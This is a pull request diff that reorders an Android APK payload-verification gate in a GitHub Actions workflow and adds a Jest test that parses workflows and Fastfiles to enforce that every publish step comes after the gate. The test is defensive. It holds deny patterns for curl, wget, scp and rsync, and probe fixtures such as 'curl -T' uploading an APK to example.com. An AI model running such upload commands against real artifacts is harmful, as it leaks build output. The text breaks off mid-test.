### PR TITLE
Harden the Android payload gate: ordering and 16 KB alignment

### DIFF
--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -275,22 +275,6 @@ jobs:
           fi
           echo "OK: llama.rn reported the declared variant list (extras, if any, are permitted and are reported by the payload check)."
 
-      - name: Verify the Android payload
-        run: |
-          node scripts/verify-android-payload.js \
-            --apk android/app/build/outputs/apk/prod/release/app-prod-release.apk \
-            --report payload-report.txt
-
-      # The report is evidence about the artifact, not the artifact, so it
-      # uploads whether or not the check passed. The APK below does not.
-      - name: Upload payload report
-        if: always()
-        uses: actions/upload-artifact@v4
-        with:
-          name: payload-report
-          path: payload-report.txt
-          if-no-files-found: ignore
-
       - name: Verify prod APK has no automation-bridge code (DCE sanity check)
         run: |
           set -euo pipefail
@@ -323,6 +307,25 @@ jobs:
             exit 1
           fi
           echo "OK: prod bundle contains zero automation markers."
+
+      # Last thing to name the APK before it is uploaded: no step may touch the
+      # artifact between the gate and the publish, and the ordering test
+      # enforces that by reading this file.
+      - name: Verify the Android payload
+        run: |
+          node scripts/verify-android-payload.js \
+            --apk android/app/build/outputs/apk/prod/release/app-prod-release.apk \
+            --report payload-report.txt
+
+      # The report is evidence about the artifact, not the artifact, so it
+      # uploads whether or not the check passed. The APK below does not.
+      - name: Upload payload report
+        if: always()
+        uses: actions/upload-artifact@v4
+        with:
+          name: payload-report
+          path: payload-report.txt
+          if-no-files-found: ignore
 
       - name: Upload Android APK
         uses: actions/upload-artifact@v4

--- a/package.json
+++ b/package.json
@@ -121,6 +121,7 @@
     "eslint-plugin-prettier": "^5.5.4",
     "husky": "^9.1.7",
     "jest": "^29.6.3",
+    "js-yaml": "^4.1.0",
     "patch-package": "^8.0.1",
     "postinstall-postinstall": "^2.1.0",
     "prettier": "3.6.2",

--- a/scripts/__tests__/android-ladder-coverage.test.js
+++ b/scripts/__tests__/android-ladder-coverage.test.js
@@ -233,9 +233,7 @@ describe('the DSP asset list tracks the runtime loader', () => {
   });
 
   it('declares exactly the assets the loader extracts, at the path it reads', () => {
-    const declared = manifest.abis
-      .flatMap(abi => abi.requiredAssets || [])
-      .sort();
+    const declared = [...manifest.assets.required].sort();
     const expected = htpLibs.map(lib => `assets/${assetDir[1]}${lib}`).sort();
 
     expect(declared).toEqual(expected);

--- a/scripts/__tests__/android-publish-ordering.test.js
+++ b/scripts/__tests__/android-publish-ordering.test.js
@@ -1,0 +1,1175 @@
+const fs = require('fs');
+const path = require('path');
+const yaml = require('js-yaml');
+
+/**
+ * Nothing may ship an Android artifact that the payload gate has not examined.
+ * That property used to live in three YAML comments, where a step reordering,
+ * an added `if:`, or a publishing step in a new workflow would break it in
+ * silence. Here it is read off the committed workflow and Fastfile text.
+ *
+ * The rules below are applied to a parsed model, never to the files in place,
+ * so every one of them is also exercised against a deliberately broken copy —
+ * a rule asserted only over the committed files is true today and held by
+ * nothing tomorrow.
+ */
+const ROOT = path.join(__dirname, '..', '..');
+const WORKFLOW_DIR = path.join(ROOT, '.github', 'workflows');
+
+// Named explicitly rather than globbed: a fourth Fastfile ships inside
+// vendor/bundle wherever `bundle install` has run, so a glob count would be
+// environment-dependent and unfit for a vacuity guard.
+const FASTFILES = [
+  ['root', path.join(ROOT, 'fastlane', 'Fastfile')],
+  ['android', path.join(ROOT, 'android', 'fastlane', 'Fastfile')],
+  ['ios', path.join(ROOT, 'ios', 'fastlane', 'Fastfile')],
+];
+
+const KNOWN_WORKFLOWS = [
+  'ci.yml',
+  'e2e-tests.yml',
+  'l10n-upload.yml',
+  'release.yml',
+];
+
+const SUSPICIOUS_RUN =
+  /upload|publish|release|git push|gh |curl|wget|scp|rsync|aws s3/i;
+
+// -- parsing ---------------------------------------------------------------
+
+/**
+ * Commentary is not command. Both Ruby and shell use `#`, and both files
+ * discuss the very actions this file classifies — the upload lane's comment
+ * quotes `gradle(task: "bundle")` to explain why it does not build.
+ */
+function codeOf(text) {
+  return String(text)
+    .split('\n')
+    .map(line => line.replace(/(^|\s)#(?!\{).*$/, '$1'))
+    .join('\n');
+}
+
+function parseLanes() {
+  const lanes = [];
+  for (const [origin, file] of FASTFILES) {
+    const source = fs.readFileSync(file, 'utf-8');
+    const starts = [...source.matchAll(/^\s*lane\s+:(\w+)\s+do/gm)];
+    starts.forEach((match, i) => {
+      const end = i + 1 < starts.length ? starts[i + 1].index : source.length;
+      lanes.push({
+        origin,
+        name: match[1],
+        body: codeOf(source.slice(match.index, end)),
+      });
+    });
+  }
+  return lanes;
+}
+
+function parseWorkflows() {
+  return fs
+    .readdirSync(WORKFLOW_DIR)
+    .filter(name => /\.ya?ml$/.test(name))
+    .sort()
+    .map(file => {
+      const doc = yaml.load(
+        fs.readFileSync(path.join(WORKFLOW_DIR, file), 'utf-8'),
+      );
+      const jobs = Object.entries(doc.jobs || {}).map(([id, job]) => ({
+        workflow: file,
+        id,
+        steps: (job.steps || []).map((step, index) => ({
+          workflow: file,
+          job: id,
+          index,
+          name: step.name || `(step ${index})`,
+          run: codeOf(step.run || ''),
+          uses: step.uses || '',
+          with: step.with || {},
+          raw: step,
+        })),
+      }));
+      return {file, jobs};
+    });
+}
+
+const model = () => ({workflows: parseWorkflows(), lanes: parseLanes()});
+const allJobs = m => m.workflows.flatMap(workflow => workflow.jobs);
+const allSteps = m => allJobs(m).flatMap(job => job.steps);
+const where = step => `${step.workflow} ${step.job} → ${step.name}`;
+
+// -- what a step says ------------------------------------------------------
+
+function lanesInvokedBy(step, lanes) {
+  return [...step.run.matchAll(/fastlane\s+(\w+)/g)]
+    .map(match => lanes.find(lane => lane.name === match[1]))
+    .filter(Boolean);
+}
+
+/**
+ * Everything a step's text can be read to name, the bodies of the fastlane
+ * lanes it invokes included. It does not follow shell scripts: a step that
+ * rewrites an artifact without naming its path is outside what a text parse
+ * can see, and is recorded as a known remainder rather than claimed.
+ */
+function stepText(step, lanes) {
+  return [
+    step.run,
+    JSON.stringify(step.with),
+    ...lanesInvokedBy(step, lanes).map(lane => lane.body),
+  ].join('\n');
+}
+
+function artifactsIn(text) {
+  return [
+    ...new Set(
+      [...String(text).matchAll(/([\w.-]+\.(?:apk|aab))/g)].map(m => m[1]),
+    ),
+  ];
+}
+
+function gitPushArguments(run) {
+  return [...run.matchAll(/git\s+push\b([^\n]*)/g)]
+    .map(match => match[1].trim())
+    .filter(Boolean);
+}
+
+function buildsAndroid(body) {
+  return (
+    /\bgradle\s*\(/.test(body) && /task:\s*"(?:assemble|bundle)"/.test(body)
+  );
+}
+
+function publishesAndroid(body) {
+  return /upload_to_play_store|\bsupply\s*\(/.test(body);
+}
+
+function isBuildingJob(job, lanes) {
+  return job.steps.some(
+    step =>
+      /gradlew\s+[^\n]*\b(?:assemble|bundle)/i.test(step.run) ||
+      lanesInvokedBy(step, lanes).some(lane => buildsAndroid(lane.body)),
+  );
+}
+
+function isGateStep(step) {
+  return (
+    step.run.includes('verify-android-payload.js') &&
+    /--(?:apk|aab)\b/.test(step.run)
+  );
+}
+
+function gateExamines(step) {
+  return [...step.run.matchAll(/--(?:apk|aab)\s+(\S+)/g)].map(match =>
+    path.basename(match[1]),
+  );
+}
+
+/**
+ * A publisher whose bytes this parse cannot name. A glob, a bare directory and
+ * a `${{ }}` expression all reach an Android build output while matching no
+ * literal `.apk`/`.aab`, so a rule keyed on filenames would see nothing to
+ * compare and skip the step entirely. It is refused instead: the gate cannot
+ * be shown to have read bytes the parse cannot identify.
+ */
+const UNRESOLVED_PATH = '(a path this parse cannot resolve)';
+
+function reachesUnresolvedAndroidOutput(value) {
+  const text = String(value ?? '');
+  return (
+    /build\/outputs/.test(text) ||
+    (text.includes('*') && /\.(?:apk|aab)/.test(text)) ||
+    text.includes('${{')
+  );
+}
+
+/** Every way this repository can put built bytes in front of someone. */
+function publisherOf(step, lanes) {
+  const text = stepText(step, lanes);
+  const pathsOrUnresolved = field => {
+    const paths = artifactsIn(JSON.stringify(step.with));
+    if (paths.length > 0) {
+      return paths;
+    }
+    return reachesUnresolvedAndroidOutput(step.with[field])
+      ? [UNRESOLVED_PATH]
+      : [];
+  };
+  if (/^actions\/upload-artifact@/.test(step.uses)) {
+    const paths = pathsOrUnresolved('path');
+    return paths.length > 0 ? {rule: 'workflow-artifact', paths} : null;
+  }
+  if (/^softprops\/action-gh-release@/.test(step.uses)) {
+    return {rule: 'github-release', paths: pathsOrUnresolved('files')};
+  }
+  if (!step.run) {
+    return null;
+  }
+  if (/upload_to_play_store/.test(text)) {
+    return {rule: 'play-upload', paths: artifactsIn(text)};
+  }
+  if (/\bgh\s+release\s+(?:create|upload)/.test(step.run)) {
+    return {rule: 'gh-release-cli', paths: artifactsIn(step.run)};
+  }
+  if (gitPushArguments(step.run).length > 0) {
+    return {rule: 'tag-push', paths: []};
+  }
+  return null;
+}
+
+function obtainsAndroidOutput(step) {
+  return (
+    /^actions\/download-artifact@/.test(step.uses) ||
+    /gh\s+run\s+download/.test(step.run) ||
+    /\b(?:curl|wget)\b/.test(step.run) ||
+    (/^actions\/cache@/.test(step.uses) &&
+      /build\/outputs/.test(JSON.stringify(step.with)))
+  );
+}
+
+// -- the exemption surfaces, each with a reason and a checked assertion -----
+
+/**
+ * Two transport patterns, not one, because `curl` and `wget` are transports in
+ * both directions. A build step has no business running either; a composite
+ * action that provisions an SDK legitimately fetches with `curl`, and is held
+ * instead by naming no artifact.
+ */
+const SENDS_BYTES_OUT =
+  /upload_to_|git push|gh\s+(?:release|api)|scp\s|rsync\s|aws s3/;
+const MOVES_BYTES_AT_ALL = new RegExp(
+  `${SENDS_BYTES_OUT.source}|\\bcurl\\b|\\bwget\\b`,
+);
+
+const namesNoAndroidArtifact = (step, _job, m) =>
+  artifactsIn(stepText(step, m.lanes)).length === 0;
+
+const carriesNoTransport = (step, _job, m) =>
+  !MOVES_BYTES_AT_ALL.test(stepText(step, m.lanes));
+
+/**
+ * A property of the job, so it is never the whole assertion: on its own it
+ * leaves a step free to grow a transport of its own while the gate below it
+ * keeps the exemption green.
+ */
+const gatedLaterInTheSameJob = (step, job) =>
+  job.steps.some(other => other.index > step.index && isGateStep(other));
+
+const buildsThenIsGated = (step, job, m) =>
+  gatedLaterInTheSameJob(step, job) &&
+  namesNoAndroidArtifact(step, job, m) &&
+  carriesNoTransport(step, job, m);
+
+const runsNoAndroidGradle = (step, job, m) => !isBuildingJob(job, m.lanes);
+
+/**
+ * A step the suspicion net flags that publishes nothing. Each entry states why
+ * and, beside it, the assertion that goes red when the reason stops holding —
+ * an exemption asserted only in prose is the hole this whole file exists to
+ * close.
+ */
+const NON_PUBLISHERS = [
+  {
+    workflow: 'release.yml',
+    job: 'build_ios',
+    step: 'Build and upload iOS app',
+    reason: 'uploads to TestFlight; carries no Android payload',
+    assert: (step, job, m) =>
+      runsNoAndroidGradle(step, job, m) &&
+      m.lanes
+        .filter(lane => lane.origin === 'ios')
+        .every(lane => !publishesAndroid(lane.body)),
+  },
+  {
+    workflow: 'release.yml',
+    job: 'build_android',
+    step: 'Commit and push version changes',
+    reason: 'pushes the version-bump commit; the tag is pushed after the gate',
+    assert: step => gitPushArguments(step.run).every(args => args === ''),
+  },
+  {
+    workflow: 'release.yml',
+    job: 'build_android',
+    step: 'Set up Android Keystore',
+    reason: 'writes the signing keystore; matched only on the key file name',
+    assert: (step, job, m) =>
+      namesNoAndroidArtifact(step, job, m) && carriesNoTransport(step, job, m),
+  },
+  {
+    workflow: 'release.yml',
+    job: 'build_android',
+    step: 'Build Android app',
+    reason: 'builds the artifacts the gate then examines in the same job',
+    assert: buildsThenIsGated,
+  },
+  {
+    workflow: 'ci.yml',
+    job: 'build-android',
+    step: 'Create dummy release keystore for CI',
+    reason: 'writes a throwaway signing key; matched only on the file name',
+    assert: (step, job, m) =>
+      namesNoAndroidArtifact(step, job, m) && carriesNoTransport(step, job, m),
+  },
+  {
+    workflow: 'ci.yml',
+    job: 'build-android',
+    step: 'Build Android Release',
+    reason: 'builds the artifact the gate then examines in the same job',
+    assert: buildsThenIsGated,
+  },
+  {
+    workflow: 'ci.yml',
+    job: 'build-ios',
+    step: 'Build iOS Release',
+    reason: 'builds an iOS binary and transports nothing',
+    assert: (step, job, m) =>
+      namesNoAndroidArtifact(step, job, m) && carriesNoTransport(step, job, m),
+  },
+  {
+    workflow: 'e2e-tests.yml',
+    job: 'build-android',
+    step: 'Create dummy release keystore for CI',
+    reason: 'writes a throwaway signing key; matched only on the file name',
+    assert: (step, job, m) =>
+      namesNoAndroidArtifact(step, job, m) && carriesNoTransport(step, job, m),
+  },
+  {
+    workflow: 'e2e-tests.yml',
+    job: 'build-android',
+    step: 'Build Android E2E APK',
+    reason: 'builds the artifact the gate then examines in the same job',
+    assert: buildsThenIsGated,
+  },
+  {
+    workflow: 'ci.yml',
+    job: 'build-android',
+    step: 'Verify prod APK has no automation-bridge code (DCE sanity check)',
+    reason: 'reads the built APK to assert what it does not contain',
+    assert: carriesNoTransport,
+  },
+  {
+    workflow: 'l10n-upload.yml',
+    job: 'upload',
+    step: 'Upload to Weblate',
+    reason: 'uploads src/locales/en.json to the translation service',
+    assert: (step, job, m) =>
+      runsNoAndroidGradle(step, job, m) && namesNoAndroidArtifact(step, job, m),
+  },
+  // The gate steps name the artifact they open, so the net flags them. They
+  // are exempt from it and governed by the gate rules instead, which are stricter than any
+  // exemption: no if:, no suppression, no pipe, and the check last.
+  ...['release.yml', 'ci.yml', 'e2e-tests.yml'].map(workflow => ({
+    workflow,
+    job: workflow === 'release.yml' ? 'build_android' : 'build-android',
+    step: 'Verify the Android payload',
+    reason: 'is the payload gate itself',
+    assert: isGateStep,
+  })),
+];
+
+const COMPOSITE_ACTIONS = {
+  './.github/actions/setup-hexagon-sdk': path.join(
+    ROOT,
+    '.github/actions/setup-hexagon-sdk/action.yml',
+  ),
+  './.github/actions/setup-ccache': path.join(
+    ROOT,
+    '.github/actions/setup-ccache/action.yml',
+  ),
+};
+
+/** Takes the source, not the path, so a mutated composite can be probed. */
+const shipsNothing = source => {
+  const commands = (yaml.load(source).runs.steps || [])
+    .map(step => `${step.run || ''}\n${step.uses || ''}`)
+    .join('\n');
+  return !SENDS_BYTES_OUT.test(commands) && artifactsIn(commands).length === 0;
+};
+
+const compositeShipsNothing = step =>
+  shipsNothing(fs.readFileSync(COMPOSITE_ACTIONS[step.uses], 'utf-8'));
+
+const cacheReachesNoBuildOutput = step =>
+  !/build\/outputs/.test(JSON.stringify(step.with));
+
+/**
+ * The actions a step may use without being classified. Floored exactly like
+ * NON_PUBLISHERS: otherwise the cheapest way to publish through a new
+ * third-party action is to add its name here.
+ *
+ * An entry declares **either** an `assert` that some input can falsify — the
+ * probe below proves each one can — **or** a `carriedBy` naming the rule that
+ * holds it instead. The two artifact-shipping actions get the second: for them
+ * "is this a publisher?" is decided by the action name itself, so any
+ * assertion phrased over the step restates its own lookup key and cannot fail.
+ * Saying so is honest; writing a tautology and calling it a check is the shape
+ * of the holes this file exists to close.
+ */
+const ALLOWED_ACTIONS = {
+  'actions/checkout@v3': {
+    reason: 'reads the repository',
+    assert: namesNoAndroidArtifact,
+  },
+  'actions/checkout@v4': {
+    reason: 'reads the repository',
+    assert: namesNoAndroidArtifact,
+  },
+  'actions/setup-node@v3': {
+    reason: 'installs a toolchain',
+    assert: namesNoAndroidArtifact,
+  },
+  'actions/setup-node@v4': {
+    reason: 'installs a toolchain',
+    assert: namesNoAndroidArtifact,
+  },
+  'actions/setup-java@v3': {
+    reason: 'installs a toolchain',
+    assert: namesNoAndroidArtifact,
+  },
+  'actions/setup-java@v4': {
+    reason: 'installs a toolchain',
+    assert: namesNoAndroidArtifact,
+  },
+  'ruby/setup-ruby@v1': {
+    reason: 'installs a toolchain',
+    assert: namesNoAndroidArtifact,
+  },
+  'actions/cache@v3': {
+    reason: 'restores a dependency cache',
+    assert: cacheReachesNoBuildOutput,
+  },
+  'actions/cache@v4': {
+    reason: 'restores a dependency cache',
+    assert: cacheReachesNoBuildOutput,
+  },
+  'google-github-actions/auth@v2': {
+    reason: 'mints a Google Cloud credential',
+    assert: namesNoAndroidArtifact,
+  },
+  'actions/upload-artifact@v4': {
+    reason:
+      'uploads a workflow artifact; whether it ships build output is decided by its own path, and a path that cannot be resolved to a filename is refused rather than skipped',
+    carriedBy: 'ordering and path identity',
+  },
+  'softprops/action-gh-release@v1': {
+    reason: 'always a publisher, by the action name alone',
+    carriedBy: 'ordering and path identity',
+  },
+  './.github/actions/setup-hexagon-sdk': {
+    reason: 'fetches and verifies the Hexagon SDK',
+    assert: compositeShipsNothing,
+  },
+  './.github/actions/setup-ccache': {
+    reason: 'restores the compiler cache',
+    assert: compositeShipsNothing,
+  },
+};
+
+/** The only two entries that may stand on `carriedBy`; a third costs a review. */
+const CARRIED_BY_THE_RULES = [
+  'actions/upload-artifact@v4',
+  'softprops/action-gh-release@v1',
+];
+
+const APK_PATH =
+  'android/app/build/outputs/apk/prod/release/app-prod-release.apk';
+
+/**
+ * One step that every exemption assertion must reject: it names the APK, sends
+ * it somewhere, pushes a tag, and sits in a building job with no gate after it.
+ */
+const PROBE_STEP = {
+  workflow: 'probe.yml',
+  job: 'probe',
+  index: 1,
+  name: 'Ship the APK',
+  run: `git push origin "v1.0.0"\ncurl -T ${APK_PATH} https://example.com/`,
+  uses: '',
+  with: {path: APK_PATH},
+  raw: {},
+};
+
+const PROBE_JOB = {
+  workflow: 'probe.yml',
+  id: 'probe',
+  steps: [
+    {
+      workflow: 'probe.yml',
+      job: 'probe',
+      index: 0,
+      name: 'Build it',
+      run: './gradlew assembleProdRelease',
+      uses: '',
+      with: {},
+      raw: {},
+    },
+    PROBE_STEP,
+  ],
+};
+
+// -- the rules -------------------------------------------------------------
+
+function exemptionFor(step) {
+  return NON_PUBLISHERS.find(
+    entry =>
+      entry.workflow === step.workflow &&
+      entry.job === step.job &&
+      entry.step === step.name,
+  );
+}
+
+/** Ordering: every publishing step sits above a gate step in its own job. */
+function violationsOfOrdering(m) {
+  const problems = [];
+  for (const job of allJobs(m)) {
+    if (!isBuildingJob(job, m.lanes)) {
+      continue;
+    }
+    const gates = job.steps.filter(isGateStep);
+    for (const step of job.steps) {
+      if (!publisherOf(step, m.lanes)) {
+        continue;
+      }
+      if (!gates.some(gate => gate.index < step.index)) {
+        problems.push(
+          `${where(step)} publishes at step ${step.index} with no gate step below it`,
+        );
+      }
+    }
+  }
+  return problems;
+}
+
+/**
+ * Path identity: the gate below a publishing step examined the bytes it publishes, and
+ * nothing between the two named that artifact again. Ordering alone binds the
+ * gate to nothing: gating the APK while publishing the bundle is ordered and
+ * examines neither.
+ */
+function violationsOfPathIdentity(m) {
+  const problems = [];
+  for (const job of allJobs(m)) {
+    const gates = job.steps.filter(isGateStep);
+    for (const step of job.steps) {
+      const publisher = publisherOf(step, m.lanes);
+      if (!publisher) {
+        continue;
+      }
+      for (const artifact of publisher.paths) {
+        if (artifact === UNRESOLVED_PATH) {
+          problems.push(
+            `${where(step)} publishes a path this parse cannot resolve to a filename, so no gate step can be shown to have examined it`,
+          );
+          continue;
+        }
+        const gate = gates
+          .filter(
+            candidate =>
+              candidate.index < step.index &&
+              gateExamines(candidate).includes(artifact),
+          )
+          .pop();
+        if (!gate) {
+          problems.push(
+            `${where(step)} publishes ${artifact}, which no gate step below it examined`,
+          );
+          continue;
+        }
+        const interposed = job.steps.find(
+          other =>
+            other.index > gate.index &&
+            other.index < step.index &&
+            stepText(other, m.lanes).includes(artifact),
+        );
+        if (interposed) {
+          problems.push(
+            `${where(interposed)} names ${artifact} after the gate examined it and before ${where(step)} publishes it`,
+          );
+        }
+      }
+    }
+  }
+  return problems;
+}
+
+/**
+ * The gate can still fail the job. A skipped, suppressed or piped gate
+ * keeps ordering and path identity green while asserting nothing: the default shell is
+ * `bash -e {0}`, which sets no pipefail, so a trailing `| tee` exits with
+ * tee's status.
+ */
+function violationsOfGateCanFail(m) {
+  const problems = [];
+  for (const step of allSteps(m)) {
+    if (!isGateStep(step)) {
+      continue;
+    }
+    const complain = why => problems.push(`${where(step)} ${why}`);
+    if (step.raw.if !== undefined) {
+      complain('carries an if:, so it can be skipped');
+    }
+    if (step.raw['continue-on-error'] !== undefined) {
+      complain('carries continue-on-error');
+    }
+    if (step.raw.shell !== undefined) {
+      complain('overrides shell:, which changes whether a pipe can hide it');
+    }
+    if (step.run.includes('||')) {
+      complain('suppresses its exit status with ||');
+    }
+    if (step.run.replace(/\|\|/g, '').includes('|')) {
+      complain('pipes its output, so it exits with the last command status');
+    }
+    if (/set\s+\+e/.test(step.run)) {
+      complain('disables errexit with set +e');
+    }
+    if (step.run.includes('--manifest')) {
+      complain('passes --manifest, which is a test flag');
+    }
+    const commands = step.run
+      .replace(/\\\n\s*/g, ' ')
+      .split('\n')
+      .map(line => line.trim())
+      .filter(line => line && !line.startsWith('#'));
+    if (!commands[commands.length - 1].includes('verify-android-payload.js')) {
+      complain('does not invoke the payload check as its final command');
+    }
+  }
+  return problems;
+}
+
+/** A publishing step outside a building job must obtain no build output. */
+function violationsOfCrossJobPublish(m) {
+  const problems = [];
+  for (const job of allJobs(m)) {
+    if (isBuildingJob(job, m.lanes)) {
+      continue;
+    }
+    const publishers = job.steps.filter(step => publisherOf(step, m.lanes));
+    const source = job.steps.find(obtainsAndroidOutput);
+    if (publishers.length > 0 && source) {
+      problems.push(
+        `${where(publishers[0])} publishes in a job that builds nothing but obtains output at ${where(source)}`,
+      );
+    }
+  }
+  return problems;
+}
+
+/** No lane both builds and publishes; the split is invisible to the workflow graph. */
+function violationsOfLaneSplit(m) {
+  return m.lanes
+    .filter(lane => buildsAndroid(lane.body) && publishesAndroid(lane.body))
+    .map(lane => `${lane.origin} lane ${lane.name} both builds and publishes`);
+}
+
+/** Anything that looks like it could ship bytes is classified or exempt. */
+function violationsOfSuspicionNet(m) {
+  return allSteps(m)
+    .filter(step => {
+      if (publisherOf(step, m.lanes) || exemptionFor(step)) {
+        return false;
+      }
+      return step.uses
+        ? !ALLOWED_ACTIONS[step.uses]
+        : SUSPICIOUS_RUN.test(step.run);
+    })
+    .map(step => `${where(step)} is neither classified nor exempt`);
+}
+
+// -- the committed files ---------------------------------------------------
+
+const committed = model();
+
+describe('the parse itself', () => {
+  // Without these, a parse that matched nothing would make every rule below
+  // pass vacuously and CI would stay green.
+  it('parses every workflow into jobs with steps, exempting none', () => {
+    const globbed = fs
+      .readdirSync(WORKFLOW_DIR)
+      .filter(name => /\.ya?ml$/.test(name))
+      .sort();
+    expect(committed.workflows.map(workflow => workflow.file)).toEqual(globbed);
+    expect(globbed).toEqual(expect.arrayContaining(KNOWN_WORKFLOWS));
+    for (const workflow of committed.workflows) {
+      expect(workflow.jobs.length).toBeGreaterThan(0);
+      for (const job of workflow.jobs) {
+        expect(job.steps.length).toBeGreaterThan(0);
+      }
+    }
+  });
+
+  it('finds exactly the three Android building jobs, each gated', () => {
+    const building = allJobs(committed)
+      .filter(job => isBuildingJob(job, committed.lanes))
+      .map(job => `${job.workflow}/${job.id}`);
+
+    // A legitimate new Android build job costs a reviewed edit to this list,
+    // which is the intended price: an ungated fourth one fails here first.
+    expect(building.sort()).toEqual([
+      'ci.yml/build-android',
+      'e2e-tests.yml/build-android',
+      'release.yml/build_android',
+    ]);
+    for (const job of allJobs(committed)) {
+      if (isBuildingJob(job, committed.lanes)) {
+        expect(job.steps.filter(isGateStep).length).toBeGreaterThan(0);
+      }
+    }
+  });
+
+  it('classifies the three release publishing steps by name', () => {
+    const steps = Object.fromEntries(
+      allSteps(committed)
+        .filter(step => step.workflow === 'release.yml')
+        .map(step => [step.name, publisherOf(step, committed.lanes)]),
+    );
+
+    expect(steps['Upload Android app to Alpha track'].rule).toBe('play-upload');
+    expect(steps['Push the release tag'].rule).toBe('tag-push');
+    expect(steps['Create GitHub Release'].rule).toBe('github-release');
+
+    // Two of the three resolve to a path the identity rule can compare; a
+    // tag names no artifact, so that rule is properly vacuous for it.
+    expect(steps['Upload Android app to Alpha track'].paths).toEqual([
+      'app-prod-release.aab',
+    ]);
+    expect(steps['Create GitHub Release'].paths).toEqual([
+      'app-prod-release.apk',
+    ]);
+    expect(steps['Push the release tag'].paths).toEqual([]);
+  });
+
+  it('leaves no exemption unmatched, on either surface', () => {
+    const suspicious = allSteps(committed).filter(step =>
+      step.uses ? true : SUSPICIOUS_RUN.test(step.run),
+    );
+    expect(suspicious.length).toBeGreaterThan(0);
+
+    for (const entry of NON_PUBLISHERS) {
+      const matched = allSteps(committed).filter(
+        step =>
+          step.workflow === entry.workflow &&
+          step.job === entry.job &&
+          step.name === entry.step,
+      );
+      expect({entry: entry.step, matched: matched.length}).toEqual({
+        entry: entry.step,
+        matched: 1,
+      });
+      expect({
+        entry: entry.step,
+        holds: entry.assert(matched[0], jobOf(matched[0]), committed),
+      }).toEqual({entry: entry.step, holds: true});
+    }
+
+    const used = new Set(
+      allSteps(committed)
+        .map(step => step.uses)
+        .filter(Boolean),
+    );
+    expect([...used].sort()).toEqual(Object.keys(ALLOWED_ACTIONS).sort());
+    for (const [action, entry] of Object.entries(ALLOWED_ACTIONS)) {
+      const steps = allSteps(committed).filter(step => step.uses === action);
+      expect({action, count: steps.length > 0}).toEqual({action, count: true});
+      // Exactly one of the two floors, never neither and never both.
+      expect({
+        action,
+        floored: Boolean(entry.assert) !== Boolean(entry.carriedBy),
+      }).toEqual({
+        action,
+        floored: true,
+      });
+      for (const step of steps) {
+        if (!entry.assert) {
+          continue;
+        }
+        expect({
+          action,
+          holds: entry.assert(step, jobOf(step), committed),
+        }).toEqual({action, holds: true});
+      }
+    }
+
+    expect(
+      Object.entries(ALLOWED_ACTIONS)
+        .filter(([, entry]) => entry.carriedBy)
+        .map(([action]) => action)
+        .sort(),
+    ).toEqual([...CARRIED_BY_THE_RULES].sort());
+  });
+
+  /**
+   * An assertion that no input can falsify is not a check, and the easiest one
+   * to write by accident restates its own lookup key. One adversarial step in
+   * an ungated building job must falsify every assertion that reads a step;
+   * one that survives it exempts by decoration. Add spellings here whenever an
+   * exemption learns to read something new about a step.
+   */
+  it('rests no exemption on an assertion that cannot fail', () => {
+    for (const entry of NON_PUBLISHERS) {
+      expect({
+        entry: `${entry.workflow} ${entry.step}`,
+        survivesTheProbe: entry.assert(PROBE_STEP, PROBE_JOB, committed),
+      }).toEqual({
+        entry: `${entry.workflow} ${entry.step}`,
+        survivesTheProbe: false,
+      });
+    }
+
+    for (const [action, entry] of Object.entries(ALLOWED_ACTIONS)) {
+      // The composites read their own action.yml rather than the step, so the
+      // step-shaped probe says nothing about them; they are probed below.
+      if (!entry.assert || COMPOSITE_ACTIONS[action]) {
+        continue;
+      }
+      expect({
+        action,
+        survivesTheProbe: entry.assert(PROBE_STEP, PROBE_JOB, committed),
+      }).toEqual({action, survivesTheProbe: false});
+    }
+  });
+
+  it('refuses a composite action that grew a way to ship bytes', () => {
+    const composite = command =>
+      [
+        'name: probe',
+        'runs:',
+        '  using: composite',
+        '  steps:',
+        `    - run: ${command}`,
+        '      shell: bash',
+      ].join('\n');
+
+    expect(shipsNothing(composite('echo hello'))).toBe(true);
+    expect(shipsNothing(composite('gh release upload v1 a.apk'))).toBe(false);
+    expect(shipsNothing(composite('curl -T a.apk https://example.com/'))).toBe(
+      false,
+    );
+    expect(shipsNothing(composite('scp a.aab example.com:/srv/'))).toBe(false);
+  });
+
+  it('reads the two Android fastlane lanes and what each one does', () => {
+    const android = committed.lanes.filter(lane => lane.origin === 'android');
+    expect(android.map(lane => lane.name)).toEqual([
+      'build_android_release',
+      'upload_android_alpha',
+    ]);
+
+    const [build, upload] = android;
+    expect(buildsAndroid(build.body)).toBe(true);
+    expect(publishesAndroid(build.body)).toBe(false);
+    expect(publishesAndroid(upload.body)).toBe(true);
+    expect(artifactsIn(upload.body)).toEqual(['app-prod-release.aab']);
+  });
+});
+
+function jobOf(step) {
+  return allJobs(committed).find(
+    job => job.workflow === step.workflow && job.id === step.job,
+  );
+}
+
+describe('no publish outruns the payload gate', () => {
+  it.each([
+    ['ordering', violationsOfOrdering],
+    ['path identity', violationsOfPathIdentity],
+    ['the gate can fail', violationsOfGateCanFail],
+    ['cross-job publishing', violationsOfCrossJobPublish],
+    ['the lane split', violationsOfLaneSplit],
+    ['the suspicion net', violationsOfSuspicionNet],
+  ])('%s holds over the committed workflows', (_label, rule) => {
+    expect(rule(committed)).toEqual([]);
+  });
+});
+
+/**
+ * Each rule is applied to a deliberately broken in-memory copy. The committed
+ * files are never touched: a rule that has only ever been seen passing is not
+ * known to be capable of failing, which is how a fail-closed assertion becomes
+ * decorative.
+ */
+describe('each rule is capable of failing', () => {
+  const broken = () => model();
+
+  const stepIn = (m, workflow, job, name) => {
+    const found = allJobs(m)
+      .find(
+        candidate => candidate.workflow === workflow && candidate.id === job,
+      )
+      .steps.find(step => step.name === name);
+    expect(found).toBeDefined();
+    return found;
+  };
+
+  const jobIn = (m, workflow, job) =>
+    allJobs(m).find(
+      candidate => candidate.workflow === workflow && candidate.id === job,
+    );
+
+  const reindex = job =>
+    job.steps.forEach((step, index) => (step.index = index));
+
+  it('ordering fails when a publishing step is moved above the gate', () => {
+    const m = broken();
+    const job = jobIn(m, 'release.yml', 'build_android');
+    const gate = job.steps.findIndex(isGateStep);
+    const upload = job.steps.findIndex(
+      step => step.name === 'Upload Android app to Alpha track',
+    );
+    job.steps.splice(gate, 0, job.steps.splice(upload, 1)[0]);
+    reindex(job);
+
+    expect(violationsOfOrdering(m)).toEqual([
+      expect.stringContaining('Upload Android app to Alpha track'),
+    ]);
+  });
+
+  it('path identity fails when a publisher ships bytes no gate step examined', () => {
+    const m = broken();
+    const job = jobIn(m, 'ci.yml', 'build-android');
+    // The gate here passes --apk only, so a bundle built and uploaded beside
